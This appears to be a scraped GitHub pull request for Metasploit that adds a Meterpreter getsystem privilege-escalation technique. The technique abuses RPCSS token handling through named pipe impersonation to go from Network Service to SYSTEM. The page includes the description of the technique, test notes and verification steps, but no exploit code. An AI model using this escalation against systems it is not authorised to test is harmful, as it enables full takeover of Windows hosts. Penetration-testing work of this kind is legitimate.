-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.
Already on GitHub? Sign in to your account
New GetSystem Technique: Named Pipe Impersonation (RPCSS Variant) #14030
Conversation
Unassigning due to some local issues on my PC which are slowing testing of this PR. Feel free to assign this issue to someone else if I don't get back to this in time, and apologies for the delay! |
I was not able to get the powershell magic working, so I used psexec from sysinternals. To launch the payload with
When the payload calls back:
|
This looks good, but I'm going to let it hang around for a few days in hopes that @OJ drops in and gives it a once-over. |
Release Notes:This ports https://github.com/sailay1996/RpcSsImpersonator to Meterpreter as GetSystem technique 4. It is a riff on the classic named pipe impersonation, but instead leverages the behavior of LSASS to return the first token for a process when a specific path is used. This can be abused by processes running as Network Service to open a handle to the RPCSS service which also runs as Network Service but contains tokens for NT AUTHORITY\SYSTEM. This also includes two payload version bumps to account for (1) the payload side to implement this functionality, and a separate, unrelated PR to add a security.MD document to payloads. |
This ports https://github.com/sailay1996/RpcSsImpersonator to Meterpreter as GetSystem technique 4. It is a riff on the classic named pipe impersonation, but instead leverages the behavior of LSASS to return the first token for a process when a specific path is used. This can be abused by processes running as Network Service to open a handle to the RPCSS service which also runs as Network Service but contains tokens for NT AUTHORITY\SYSTEM 馃帀 . In order to make this more dynamic, when filtering our the token handles for the RPCSS service, I select the SYSTEM token with the most privileges (to account for filtered tokens). This should select the best / most-privileged SYSTEM token on multiple versions of Windows, instead of using the hard-coded value of 22 as described in Faxing Your Way To System.
This is the Framework side of rapid7/metasploit-payloads#431.
I also fixed a bug where the service name parameter was missing for the most common technique (1). This fixes the
getsystem -t 1
command.I tested this code in the following environments:
While I also tested Windows 7, the
NtQueryInformationProcess
command reported that the ProcessHandleInformation was unavailable by returning NT status 0xc0000003 (STATUS_INVALID_INFO_CLASS). Because of that, I pinned this to Windows versions 6.3 and newer which is Windows 8.1 / Server 2012 R2. On older systems, Meterpreter will fail withERROR_CALL_NOT_IMPLEMENTED
.For reference on this technique:
I also want to note that I think this escalation technique is a good candidate for incorporation into
getsystem
for the following reasons (as opposed to implementation as a local exploit module via an RDLL).getsystem
Verification
List the steps needed to make sure this thing works
~/.msf4/payloads/meterpreter
.msfconsole
and setup a handler for a native Windows MeterpreterNT AUTHORITY\NETWORK SERVICE
(use these steps)getsystem
, you should see that it was successful using technique 4getsystem
without a specific technique causes all of them to be attempted, sequentially so this also shows that the existing techniques 1-3 did not workDemo